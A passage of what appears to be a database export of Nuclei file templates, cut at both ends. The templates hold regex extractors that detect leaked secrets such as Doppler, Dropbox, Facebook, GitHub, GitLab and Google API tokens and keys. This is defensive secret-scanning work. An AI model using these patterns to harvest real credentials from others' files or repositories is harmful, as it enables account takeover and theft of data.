\\b(dckr_pat_[a-zA-Z0-9_-]{27})(?:$|[^a-zA-Z0-9_-])\n# digest: 4a0a00473045022100bc73fcf69453af6d917f363d99e57d06620e6b40f1e38b54ac72982c1aff0865022030218f700bce4f88878c34d596fcc3563ee6a6a0f233055703455751caaabd08:922c64590222798bb761d5b6d8e72950", "hash": "be6bcc12b58145be6426a10cdd0280a1", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d30" }, "name": "doppler-audit.yaml", "content": "id: doppler-audit\n\ninfo:\n name: Doppler Audit Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/doppler.yml\n - https://docs.doppler.com/reference/api\n - https://docs.doppler.com/reference/auth-token-formats\n metadata:\n verified: true\n tags: doppler,keys,file\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - \\b(dp\\.audit\\.[a-zA-Z0-9]{40,44})\\b\n# digest: 490a00463044022047f3853a49b38bfc41c3a21edae871fa20dbc00c3e4fec75a443da4c802ce4e702205fce2aa010ee24edfbc190aad5475ba28a4ea42e81476b2e36a2eb95de8c4479:922c64590222798bb761d5b6d8e72950", "hash": "6ea9b51b81cce6d2e942d70fee8da510", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d31" }, "name": "doppler-cli.yaml", "content": "id: doppler-cli\n\ninfo:\n name: Doppler CLI Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/doppler.yml\n - https://docs.doppler.com/reference/api\n - https://docs.doppler.com/reference/auth-token-formats\n metadata:\n verified: true\n tags: doppler,keys,file\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - \\b(dp\\.ct\\.[a-zA-Z0-9]{40,44})\\b\n# digest: 4b0a00483046022100de413ad22bea43d8292d3d22ed07b2d5c6a06bfb4819104c20eeb9134f913be2022100d2915ad20b135f4f8d477c1acec455af6c749833455e09d2542c0e849ab3fc7b:922c64590222798bb761d5b6d8e72950", "hash": "d1ae45c46d3f5924fcc57efca5b2cd59", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d32" }, "name": "doppler-scim.yaml", "content": "id: doppler-scim\n\ninfo:\n name: Doppler SCIM Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/doppler.yml\n - https://docs.doppler.com/reference/api\n - https://docs.doppler.com/reference/auth-token-formats\n metadata:\n verified: true\n tags: doppler,keys,file\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - \\b(dp\\.scim\\.[a-zA-Z0-9]{40,44})\\b\n# digest: 4a0a00473045022010274194b3725b6ef14112e5fc7f4e0d5c60123a51583f044bf2e94b76077001022100a0caa7739f04c145ec8ee920c613f38a6b5befd04918931bd0ee39cfdbcf3a44:922c64590222798bb761d5b6d8e72950", "hash": "5cfdfc811e8b5a582dc45d2206e78b40", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d33" }, "name": "doppler-service-account.yaml", "content": "id: doppler-service-account\n\ninfo:\n name: Doppler Service Account Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/doppler.yml\n - https://docs.doppler.com/reference/api\n - https://docs.doppler.com/reference/auth-token-formats\n metadata:\n verified: true\n tags: doppler,keys,file\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - \\b(dp\\.sa\\.[a-zA-Z0-9]{40,44})\\b\n# digest: 4a0a00473045022100c8177f1a0244e794af08cc9615e65a415d8cb7dc3616acc9f779e61aab518eb002204d63814164c93815807eb87c0919830977be1d4f878bd1697b90644de744894c:922c64590222798bb761d5b6d8e72950", "hash": "25fa69079635d6ecb1a1873a2099e2bb", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d34" }, "name": "doppler-service.yaml", "content": "id: doppler-service\n\ninfo:\n name: Doppler Service\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/doppler.yml\n - https://docs.doppler.com/reference/api\n - https://docs.doppler.com/reference/auth-token-formats\n metadata:\n verified: true\n tags: doppler,keys,file\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - \\b(dp\\.st\\.(?:[a-z0-9\\-_]{2,35}\\.)?[a-zA-Z0-9]{40,44})\\b\n# digest: 4a0a00473045022100b61969103e1649c2c330814280aea5b020d5f47ca55c9601d0647af01c47ddbf02200698f545c2217332324593dffcc44a82bccb5ec45faf31507c356b71ee4ad7cf:922c64590222798bb761d5b6d8e72950", "hash": "9cf148f81b106ae3fc64749f0fc5d249", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d35" }, "name": "dropbox-access.yaml", "content": "id: dropbox-access\n\ninfo:\n name: Dropbox Access Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/dropbox.yml\n - https://developers.dropbox.com/oauth-guide\n - https://www.dropbox.com/developers/\n - https://www.dropbox.com/developers/documentation/http/documentation\n metadata:\n verified: true\n tags: dropbox,keys,file\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - \\b(sl\\.[a-zA-Z0-9_-]{130,152})(?:$|[^a-zA-Z0-9_-])\n# digest: 490a0046304402203d0305c1997e320e30d2d0ad0460beb9c8478986a0f1b75f621167a79f8ca17302206da5b41a7402312c0d16fc2665349e3caf8aac3cee677a34f34089d739a743c6:922c64590222798bb761d5b6d8e72950", "hash": "223f5eb11624b72cdcbfbc1e899dc106", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d36" }, "name": "dropbox-api-token.yaml", "content": "id: dropbox-api-token\n\ninfo:\n name: Dropbox API Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-api-token.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-api-token.go\n metadata:\n verified: true\n tags: file,keys,dropbox,token\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:dropbox)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-z0-9]{15})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 4a0a00473045022100e195768a79de92a350e9ebbad15bac8d585c15a3990f36e0090992948eba7f0002203a3094d187586339c95b773f2a4c5f68f4dcc23bcebea94b0e590dc3751053b7:922c64590222798bb761d5b6d8e72950", "hash": "8f94a7a93325d5829b822016f7c5a148", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d37" }, "name": "dropbox-longlived-token.yaml", "content": "id: dropbox-longlived-token\n\ninfo:\n name: Dropbox Long Lived API Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-long-lived-api-token.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-long-lived-api-token.go\n metadata:\n verified: true\n tags: file,keys,dropbox,token\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:dropbox)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-z0-9]{11}(AAAAAAAAAA)[a-z0-9\\-_=]{43})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 4a0a004730450220600b28a10ce8749e2bf39b10f83a1b0e1da1bd3319d054a1915a49db90f28393022100fe4ded4b3701ce5f48ce8bebadec45469a6b81359de76e161f40b3a29a4acdc1:922c64590222798bb761d5b6d8e72950", "hash": "121db606987114bf77b67688fb66e856", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d38" }, "name": "dropbox-shortlived-token.yaml", "content": "id: dropbox-shortlived-token\n\ninfo:\n name: Dropbox Short Lived API Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-short-lived-api-token.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-short-lived-api-token.go\n metadata:\n verified: true\n tags: file,keys,dropbox,token\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:dropbox)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}(sl\\.[a-z0-9\\-=_]{135})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 490a00463044022033ed532c958e77394bb29e2e0d62c753914de655409ff23f7baed5576027a5770220052af03c0f1363b4acc54b0a01da4503325c089caaf4f74410db82d91dbf5f28:922c64590222798bb761d5b6d8e72950", "hash": "fd0f319f18aaecff4c79247dc82d14ee", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d39" }, "name": "easypost-api-token.yaml", "content": "id: easypost-api-token\n\ninfo:\n name: Easypost Test API Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/easypost-api-token.go\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/easypost-api-token.yaml\n metadata:\n verified: true\n tags: file,keys,easypost,token\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - EZAK(?i)[a-z0-9]{54}\n# digest: 4b0a00483046022100e61496ecd8994a3249bfa7ced4fdb49d6518b2b47fc556b3e611abeecd64c2c1022100c69eb40905d2e780d9e2a07b44b0a0956cbfc868c0b9e46c93421e26a73b9c21:922c64590222798bb761d5b6d8e72950", "hash": "4f2ae5a77c0f581c6b7e970e6ccc3407", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d3a" }, "name": "easypost-test-token.yaml", "content": "id: easypost-test-token\n\ninfo:\n name: Easypost Test API Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/easypost-test-api-token.go\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/easypost-test-api-token.yaml\n metadata:\n verified: true\n tags: file,keys,easypost,token\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - EZTK(?i)[a-z0-9]{54}\n# digest: 4b0a00483046022100a8a903d8c12982d4215d7d686683821b3a72ee119e106b1c62de92ea9e2e8891022100dda07ef96999d284589a8ab9524c24512ac4e4be6190717fd70fb0837e99b08d:922c64590222798bb761d5b6d8e72950", "hash": "6cbb05b08bec26ee85ef5f611d7ab7f8", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d3b" }, "name": "facebook-api-token.yaml", "content": "id: facebook-api-token\n\ninfo:\n name: Facebook API Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/facebook.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/facebook.go\n metadata:\n verified: true\n tags: keys,file,facebook,token\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:facebook)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-f0-9]{32})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 4a0a00473045022039cfc3385a5e54130639427498934edb6851cbbfa0cb2fa9e0766c80de9c2f06022100a24d18ff30e17c296e32f42a80fee23cf4ae78eb0e82b85e1b399663945788f7:922c64590222798bb761d5b6d8e72950", "hash": "747ff3749c7b65cbeb92c569d22453ad", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d3c" }, "name": "facebook-client-id.yaml", "content": "id: facebook-client-id\n\ninfo:\n name: Facebook Client ID - Detect\n author: gaurang\n severity: info\n description: Facebook client ID token was detected.\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: keys,file,token,facebook\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"(?i)(facebook|fb)(.{0,20})?['\\\"][0-9]{13,17}['\\\"]\"\n\n# Enhanced by md on 2023/05/04\n# digest: 490a0046304402205c3ed81a6b30472131610c16c17b09e837f4a50a24ea7855646cd4f63681693102206d187a7c8a35d1a8a6d44bc7ffb3df51f06401d98e210d0f0233744e5cf0496b:922c64590222798bb761d5b6d8e72950", "hash": "fc50858c8643236b8f752c96f7af9802", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d3d" }, "name": "facebook-secret.yaml", "content": "id: facebook-secret-key\n\ninfo:\n name: Facebook Secret Key - Detect\n author: gaurang\n severity: low\n description: Facebook secret key token was detected.\n tags: keys,file,token,facebook\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"(?i)(facebook|fb)(.{0,20})?(?-i)['\\\"][0-9a-f]{32}['\\\"]\"\n# digest: 490a004630440220088a4482a94c06fc1c8f203f3c7c1bb1c49303682b030f8012e682c9b0b1a4d6022069258d660c85e0daa2e6406090f1d54b78ac348fbb963c372d123327433408ee:922c64590222798bb761d5b6d8e72950", "hash": "f21d793475d01ba8c23e29d74364b093", "level": 3, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d3e" }, "name": "fb-access-token.yaml", "content": "id: fb-access-token\n\ninfo:\n name: Facebook Access Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/facebook.yml\n - https://developers.facebook.com/docs/facebook-login/access-tokens/\n metadata:\n verified: true\n tags: file,keys,facebook,token\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - '\\b(EAACEdEose0cBA[a-zA-Z0-9]+)\\b'\n# digest: 4b0a00483046022100906343469fb8f96da3ccf0963909ce5c20670bdff9d3b67347567d8983225e880221008bae64c94e2bbd5ae50d2d96d011e27e00695b52e82a7be86533132940bd8095:922c64590222798bb761d5b6d8e72950", "hash": "c08de9324cc4eaf04ff6e11931187d8d", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d3f" }, "name": "finicity-api-token.yaml", "content": "id: finicity-api-token\n\ninfo:\n name: Finicity API Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finicity-api-token.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finicity-api-token.go\n metadata:\n verified: true\n tags: file,keys,finicity,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:finicity)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-f0-9]{32})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 4b0a00483046022100f241e2b7819d9662106d68984ceab12ce6488feefc724d94bc7a131c814f1bc3022100d335261dd3b17fa626f653da06a0287f63003626693e3a6ae7dc137786af7a13:922c64590222798bb761d5b6d8e72950", "hash": "502f14164431d4b10cfe9a64d306103a", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d40" }, "name": "finicity-client-secret.yaml", "content": "id: finicity-client-secret\n\ninfo:\n name: Finicity Client Secret\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finicity-client-secret.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finicity-client-secret.go\n metadata:\n verified: true\n tags: file,keys,finicity,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:finicity)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-z0-9]{20})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 4a0a004730450220654a1f5a3e4adeca05a57c66008b411228a269685dc3c0029b8f81a6199cf45e022100ef719245aad660e2cd86603013a99c42ea967eeb6626760cc0c33070b7e54f81:922c64590222798bb761d5b6d8e72950", "hash": "fcd73f2612a318673635aaf3947396e4", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d41" }, "name": "flutterwave-encryption-key.yaml", "content": "id: flutterwave-encryption-key\n\ninfo:\n name: Flutterwave Encryption Key\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-encryption-key.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-encryption-key.go\n metadata:\n verified: true\n tags: flutter,file,keys,flutterwave\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - FLWSECK_TEST-(?i)[a-h0-9]{12}\n\n# digest: 490a00463044022001bb728280f64a65aad5cf17534d751dbe1cda89c68bb06251a2232fe7ca0810022037d2fb62e03bd86162102d5d381a0c5a6c54728628a5381af1eeaac926773f91:922c64590222798bb761d5b6d8e72950\n", "hash": "7bd709da3b9f58edd29672c90836d72d", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d42" }, "name": "flutterwave-public-key.yaml", "content": "id: flutterwave-public-key\n\ninfo:\n name: Flutterwave Public Key\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-public-key.go\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-public-key.yaml\n metadata:\n verified: true\n tags: flutter,file,keys,flutterwave\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - FLWPUBK_TEST-(?i)[a-h0-9]{32}-X\n\n# digest: 4a0a0047304502201663f48cdd3af7e4e844c938a840b398231226cf267ce2b9b71aee64b4f01b070221009b15d106d4003dba20c9c1de1a7531478ba5abe063299fa31fad81343c1b8e07:922c64590222798bb761d5b6d8e72950\n", "hash": "3dc7fb6c8b9a97c457940c9c5b656015", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d43" }, "name": "flutterwave-secret-key.yaml", "content": "id: flutterwave-secret-key\n\ninfo:\n name: Flutterwave Secret Key\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-secret-key.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-secret-key.go\n metadata:\n verified: true\n tags: flutter,file,keys,flutterwave\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - FLWSECK_TEST-(?i)[a-h0-9]{32}-X\n\n# digest: 4a0a00473045022100ef800d5ff9a0070b05c95c26fea14222a4efb0739951eea468e07f08ccef665a022008c000020cb1a4316a03521c4fd6d3af85de85340d924cff0d0936b80b1ed85f:922c64590222798bb761d5b6d8e72950\n", "hash": "968a77a0bb5de2ebb9f9997512a0c6d6", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d44" }, "name": "github-app-token.yaml", "content": "id: github-app-token\n\ninfo:\n name: Github App Token\n author: tanq16,DhiyaneshDK\n severity: medium\n tags: keys,file,token,github\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"\\b((?:ghu|ghs)_[a-zA-Z0-9]{36})\\b\"\n# digest: 4b0a00483046022100b9d3d1fd11451fe2d5bb3cc0d433ee22cae5ca24e86f5b60845cb3103ad053fe0221009741eb11789fe97cedd0f7fb821d82fa102bb7b65a4f00a99e9c3f2792cb8306:922c64590222798bb761d5b6d8e72950", "hash": "51d63b76271487be88f01587c781ce19", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d45" }, "name": "github-oauth-token.yaml", "content": "id: github-oauth-token\n\ninfo:\n name: Github OAuth Access Token\n author: tanq16\n severity: high\n tags: file,keys,token,github\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"gho_.{36}\"\n# digest: 4a0a004730450221008c53926b33a3b4059610c1a3fea1979833257a4acc6a7b3f42f1be341cd326320220284a515e5b905b6e7eb5cfba9858b243614aaceaf6da411d2e1cd9368de769fe:922c64590222798bb761d5b6d8e72950", "hash": "7d9f5e91fd46fc407eeecce71c1fd97f", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d46" }, "name": "github-outdated-key.yaml", "content": "id: github-outdated-key\n\ninfo:\n name: GitHub Outdated RSA SSH Host key\n author: naglis\n severity: info\n description: |\n At approximately 05:00 UTC on March 24, out of an abundance of caution, we replaced our RSA SSH host key used to secure Git operations for GitHub.com.\n reference:\n - https://github.blog/2023-03-23-we-updated-our-rsa-ssh-host-key/\n - https://web.archive.org/web/20230316194229/https://docs.github.com/en/enterprise-cloud@latest/authentication/keeping-your-account-and-data-secure/githubs-ssh-key-fingerprints\n metadata:\n verified: true\n tags: file,keys,github,ssh,rsa\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - SHA256:nThbg6kXUpJWGl7E1IGOCspRomTxdCARLviKw6E5SY8\n - ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAq2A7hRGmdnm9tUDbO9IDSwBK6TbQa\\+PXYPCPy6rbTrTtw7PHkccKrpp0yVhp5HdEIcKr6pLlVDBfOLX9QUsyCOV0wzfjIJNlGEYsdlLJizHhbn2mUjvSAHQqZETYP81eFzLQNnPHt4EVVUh7VfDESU84KezmD5QlWpXLmvU31/yMf\\+Se8xhHTvKSCZIFImWwoG6mbUoWf9nzpIoaSjB\\+weqqUUmpaaasXVal72J\\+UX2B\\+2RPW3RcT0eOzQgqlJL3RKrTJvdsjE3JEAvGq3lGHSZXy28G3skua2SmVi/w4yCE6gbODqnTWlg7\\+wC604ydGXA8VJiS5ap43JXiUFFAaQ==\n# digest: 4b0a0048304602210097d39a926e780cd375fdb4adaba3f38cf210fbc9da81445df494d206635403cb022100c7c85a7539d3e8aa0fe0d632358176e1ed6544ca71d770325f5f446070b6c555:922c64590222798bb761d5b6d8e72950", "hash": "988c283bce7376b6aaa7589bcd3b07a6", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d47" }, "name": "github-personal-token.yaml", "content": "id: github-personal-token\n\ninfo:\n name: Github Personal Token\n author: geeknik\n severity: high\n tags: file,keys,token,github\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"ghp_.{36}\"\n - \"github_pat_.{82}\"\n# digest: 4a0a0047304502203c2ec1412ad731d19d011f31640fed087cbff2458bb3566ef8b6eeab67685fb7022100ff8093aefd8308c39e24dd35a59ced0166d4d5142d2d53104ae639032ca9693f:922c64590222798bb761d5b6d8e72950", "hash": "329b754fd60f3e85ea6271fe98e7c7e3", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d48" }, "name": "github-refresh-token.yaml", "content": "id: github-refresh-token\n\ninfo:\n name: Github Refresh Token\n author: tanq16\n severity: high\n tags: file,keys,token,github\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"ghr_.{76}\"\n# digest: 4a0a0047304502206bdea7a5561d353ecf0a6457d342c940765d8eb423c3755d8333abf20dd73a4c022100bd0ba1e3a2ae3c4a5f075e75be2bf4db20ed798233f99cc306f29b550ec7a054:922c64590222798bb761d5b6d8e72950", "hash": "0ad303f240addbee4e78ab68f9673d9c", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d49" }, "name": "gitlab-personal-accesstoken.yaml", "content": "id: gitlab-personal-accesstoken\n\ninfo:\n name: GitLab Personal Access Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/gitlab.yml\n - https://docs.gitlab.com/ee/user/profile/personal_access_tokens.html\n metadata:\n verified: true\n tags: file,keys,gitlab,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - '\\b(glpat-[0-9a-zA-Z_-]{20})(?:\\b|$)'\n# digest: 4a0a00473045022100d8f81a139d1a55d53b48483cf5f37388a5aa00533518f37e62262ce7d746a8e30220645f888c251b51c3e07bb926d8f51c1bc02d0e34e1970911c9aa95395364078b:922c64590222798bb761d5b6d8e72950", "hash": "43f7ffb65232986e92a11405a4956834", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d4a" }, "name": "gitlab-pipeline-triggertoken.yaml", "content": "id: gitlab-pipeline-triggertoken\n\ninfo:\n name: GitLab Pipeline Trigger Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/gitlab.yml\n - https://docs.gitlab.com/ee/ci/triggers/\n - https://gitlab.com/gitlab-org/gitlab/-/issues/371396\n - https://gitlab.com/gitlab-org/gitlab/-/issues/388379\n metadata:\n verified: true\n tags: keys,file,gitlab,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - '\\b(glptt-[0-9a-f]{40})\\b'\n# digest: 4a0a004730450221008cbf4eb94765a87a19f157f6c0c8c2bdf2065beccbd30d912cc939db48373953022029b0256eda9ca89370a55cd4af46c29517647ada90ad11704cd7dd580313882d:922c64590222798bb761d5b6d8e72950", "hash": "0c273ce716f9bb770b25a0384550f7ac", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d4b" }, "name": "gitlab-runner-regtoken.yaml", "content": "id: gitlab-runner-regtoken\n\ninfo:\n name: GitLab Runner Registration Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/gitlab.yml\n - https://docs.gitlab.com/runner/security/\n - https://docs.gitlab.com/ee/security/token_overview.html#runner-registration-tokens-deprecated\n - https://docs.gitlab.com/ee/security/token_overview.html#security-considerations\n metadata:\n verified: true\n tags: keys,file,gitlab,runner,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - '\\b(GR1348941[0-9a-zA-Z_-]{20})(?:\\b|$)'\n# digest: 4b0a00483046022100d013cf84c226c19433c9eb5d26b3e01b5e8836a0eb5d4ff3b9983b307e6e198b022100ee983342a74bf1953a0bdeaeb6f39798c018ad2ac2e23c3075f35ff0b5186010:922c64590222798bb761d5b6d8e72950", "hash": "f87e83116e3de7fe807a7f6a3ad3b8a3", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d4c" }, "name": "google-api.yaml", "content": "id: google-api-key-file\n\ninfo:\n name: Google API key\n author: gaurang\n severity: info\n tags: keys,file,token,google\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"AIza[0-9A-Za-z\\\\-_]{35}\"\n# digest: 4a0a00473045022100d10b8c8ea01d04d065a9d13f5f60048a32c908cc2c5a3f9b4ddcb5ba2f7e823a022039f78018968a42018e32f1a2ccb17df81b9255d14d9094659d95e160eb09eb4a:922c64590222798bb761d5b6d8e72950", "hash": "85c957e5b623f46463b8d86dc4d4a66b", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d4d" }, "name": "google-clientid.yaml", "content": "id: google-clientid\n\ninfo:\n name: Google Client ID\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/google.yml\n metadata:\n verified: true\n tags: file,keys,google,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - '(?i)\\b([0-9]+-[a-z0-9_]{32})\\.apps\\.googleusercontent\\.com'\n# digest: 